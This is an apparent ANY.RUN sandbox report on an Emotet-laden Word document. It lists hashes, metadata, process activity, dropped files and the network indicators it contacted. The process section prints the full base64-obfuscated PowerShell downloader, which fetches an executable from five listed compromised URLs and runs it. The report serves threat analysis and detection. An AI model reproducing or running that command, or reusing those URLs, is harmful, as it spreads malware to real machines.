analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

2019_05- Balance & Payment Report(1).doc

Full analysis: https://app.any.run/tasks/f8616cf7-47c4-4d41-ba1d-fe2a09eefb93
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: May 20, 2019, 16:56:44
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
opendir
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Alaska multi-state, Subject: Tajikistan, Author: Heloise King, Comments: hacking 1080p, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon May 20 13:33:00 2019, Last Saved Time/Date: Mon May 20 13:33:00 2019, Number of Pages: 1, Number of Words: 10, Number of Characters: 61, Security: 0
MD5:

658034FD1619C7E230BAE4268A8A2C94

SHA1:

700A2DDE16A74AA3611AB724253B95142040B87A

SHA256:

EC301C4AF74D43F54E94E6D081EC113462923D89DF57AD4CCA6ABB9B653EB299

SSDEEP:

3072:if77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qisQvQTo7b8SRz7j:if77HUUUUUUUUUUUUUUUUUUUT52VxsQb

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3852)
    • PowerShell script executed

      • powershell.exe (PID: 3852)
    • Executed via WMI

      • powershell.exe (PID: 3852)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3984)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3984)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
Title: Alaska multi-state
Subject: Tajikistan
Author: Heloise King
Keywords: -
Comments: hacking 1080p
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:05:20 12:33:00
ModifyDate: 2019:05:20 12:33:00
Pages: 1
Words: 10
Characters: 61
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Altenwerth, Frami and Schuppe
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 70
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Kozey
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3984"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\2019_05- Balance & Payment Report(1).doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3852powershell -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e JABxADcANABfADkAOAA0ADQAPQAnAHYAMgBfADkAMQAyACcAOwAkAGgANAAwADQAMwA4ADIAMwAgAD0AIAAnADcAMAA0ACcAOwAkAG4AMgAwADIAXwA5AD0AJwBLADAANQAzADAANAAyADUAJwA7ACQARAA0ADgAMwA3ADIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGgANAAwADQAMwA4ADIAMwArACcALgBlAHgAZQAnADsAJABIADYAXwBfADQAMAAxADEAPQAnAEUAMwAxAF8AOAAwADcAJwA7ACQAdwA5AF8AXwAxADUAOQA9AC4AKAAnAG4AZQB3AC0AJwArACcAbwAnACsAJwBiAGoAZQBjAHQAJwApACAATgBFAFQALgB3AEUAYgBgAGMAbABpAGAARQBgAE4AdAA7ACQAegA5ADEANgAwADUANgA3AD0AJwBoAHQAdABwADoALwAvAHQAbwBuAGcAZABhAGkAZgBwAHQALgBuAGUAdAAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGgAeQBsAEsATABkAEoAVwBPAGgALwBAAGgAdAB0AHAAOgAvAC8AZQAtAHMAYQBsAGEAbQBwAHIAbwAuAGMAbwBtAC8AcwBhAHMAbgBlAGsAYQB0AC4AYwBvAG0ALwBhAHcAYwAyADYAMAAxAGIAXwBrAGYAOQA1AHUAbABkAHkANAAtADMANgAvAEAAaAB0AHQAcAA6AC8ALwBmAGkAbAB0AG8ALgBtAGwALwBjAGcAaQAtAGIAaQBuAC8AYQBNAHEAcQB1AEUAcwBRAHcALwBAAGgAdAB0AHAAOgAvAC8AcQBwAGQAaQBnAGkAdABlAGMAaAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AeABtAHQANgBrAHUANQA5AHAAbABfADgANgBiAHQAOABmAHYALQA3ADMAOQAxADkAOAAwADMALwBAAGgAdAB0AHAAOgAvAC8AbwBtAGUAcwB0AHIAZQBtAGEAcgBjAGUAbgBlAGkAcgBvAC4AYwBvAG0ALgBiAHIALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBjAGcAZQB5AF8AdgBwADgANgA3AHMAMgAzADgALQAxADcALwAnAC4AUwBwAEwAaQBUACgAJwBAACcAKQA7ACQAVgA1ADMANwBfADIANQBfAD0AJwByADkANAA4ADMANwAnADsAZgBvAHIAZQBhAGMAaAAoACQAQgA1ADEANwBfADMAIABpAG4AIAAkAHoAOQAxADYAMAA1ADYANwApAHsAdAByAHkAewAkAHcAOQBfAF8AMQA1ADkALgBkAE8AVwBuAGwAbwBBAEQARgBJAEwARQAoACQAQgA1ADEANwBfADMALAAgACQARAA0ADgAMwA3ADIAKQA7ACQAcgAwADEAMgAwADMAPQAnAHoAMAA1ADcAXwA5ADUAJwA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABEADQAOAAzADcAMgApAC4AbABFAE4AZwBUAGgAIAAtAGcAZQAgADIAOAA2ADcANQApACAAewAuACgAJwBJAG4AdgBvACcAKwAnAGsAZQAnACsAJwAtAEkAdABlACcAKwAnAG0AJwApACAAJABEADQAOAAzADcAMgA7ACQAegAwADEAOQAwADAAMQA9ACcAZgA4ADcAMAA1ADcANwAnADsAYgByAGUAYQBrADsAJAB3ADQANgBfADAANAAyADYAPQAnAEUAMQA0AF8AOAA4ADcAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQwBfADIAMgBfADcAPQAnAFMAXwAxAF8ANQAxADcANgAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 531
Read events
1 062
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
9

Dropped files

PID
Process
Filename
Type
3984WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR4058.tmp.cvr
MD5:
SHA256:
3852powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1I7F3G9T40NWE9RPM8TB.temp
MD5:
SHA256:
3984WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:D3496C264A6F86A1E05764C9AB22FEA2
SHA256:0E9E76B5B6CC1B952C7C0ABC766B51BF8EAA383386A0035F5D304A1820528E1D
3984WINWORD.EXEC:\Users\admin\Downloads\~$19_05- Balance & Payment Report(1).docpgc
MD5:3766B18CCB3E4CF165245FD67F4BDAA4
SHA256:393F9CBAB18B78AAF7C64BF281D3894A4E922AB787305A2900AC4CCE38EEF56F
3984WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F36BEDF3.wmfwmf
MD5:2DA88F0FE936F3B12CB340EACF81B8A6
SHA256:9EAB3E3621515F38E42BAA52ACD22C462B7E42D59BBC2693FD4316F2BD5514E1
3852powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF134ac8.TMPbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
3852powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
3984WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F3B9BF26.wmfwmf
MD5:6E51B61C96263E3AE721C223DA1E0BC6
SHA256:0704E38772457880B0F6D8D7E54F50621BE993DB2D88AC4BF8425ECDE891FA5C
3984WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\2019_05- Balance & Payment Report(1).doc.LNKlnk
MD5:A22776E97570A21D67CF7D4F6315238D
SHA256:629CEF9004043BF217E674A17C5BE56AA0CC6444DEBEC2600897C690F922D00A
3984WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9A04E758.wmfwmf
MD5:A34E0F68CE15E486FFBC920055F4953B
SHA256:510F989BD09D83FD024C0473F93C6C757F6682DF8DCA7693AEBA25B919F12BC8
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3852
powershell.exe
GET
404
103.253.212.121:80
http://e-salampro.com/sasnekat.com/awc2601b_kf95uldy4-36/
ID
xml
345 b
unknown
3852
powershell.exe
GET
404
89.44.32.201:80
http://filto.ml/cgi-bin/aMqquEsQw/
RO
xml
345 b
suspicious
3852
powershell.exe
GET
404
201.73.143.108:80
http://omestremarceneiro.com.br/wp-includes/cgey_vp867s238-17/
BR
xml
345 b
suspicious
3852
powershell.exe
GET
404
103.58.148.214:80
http://qpdigitech.com/wp-admin/xmt6ku59pl_86bt8fv-73919803/
TH
xml
345 b
malicious
3852
powershell.exe
GET
404
203.113.174.46:80
http://tongdaifpt.net/wp-includes/hylKLdJWOh/
VN
xml
345 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3852
powershell.exe
203.113.174.46:80
tongdaifpt.net
Viettel Corporation
VN
malicious
3852
powershell.exe
103.58.148.214:80
qpdigitech.com
DE-CORP
TH
malicious
3852
powershell.exe
201.73.143.108:80
omestremarceneiro.com.br
CLARO S.A.
BR
unknown
3852
powershell.exe
89.44.32.201:80
filto.ml
Xt Global Networks Ltd.
RO
suspicious
3852
powershell.exe
103.253.212.121:80
e-salampro.com
Rumahweb Indonesia CV.
ID
unknown

DNS requests

Domain
IP
Reputation
tongdaifpt.net
  • 203.113.174.46
malicious
e-salampro.com
  • 103.253.212.121
unknown
filto.ml
  • 89.44.32.201
suspicious
qpdigitech.com
  • 103.58.148.214
malicious
omestremarceneiro.com.br
  • 201.73.143.108
suspicious

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET INFO DNS Query for Suspicious .ml Domain
No debug info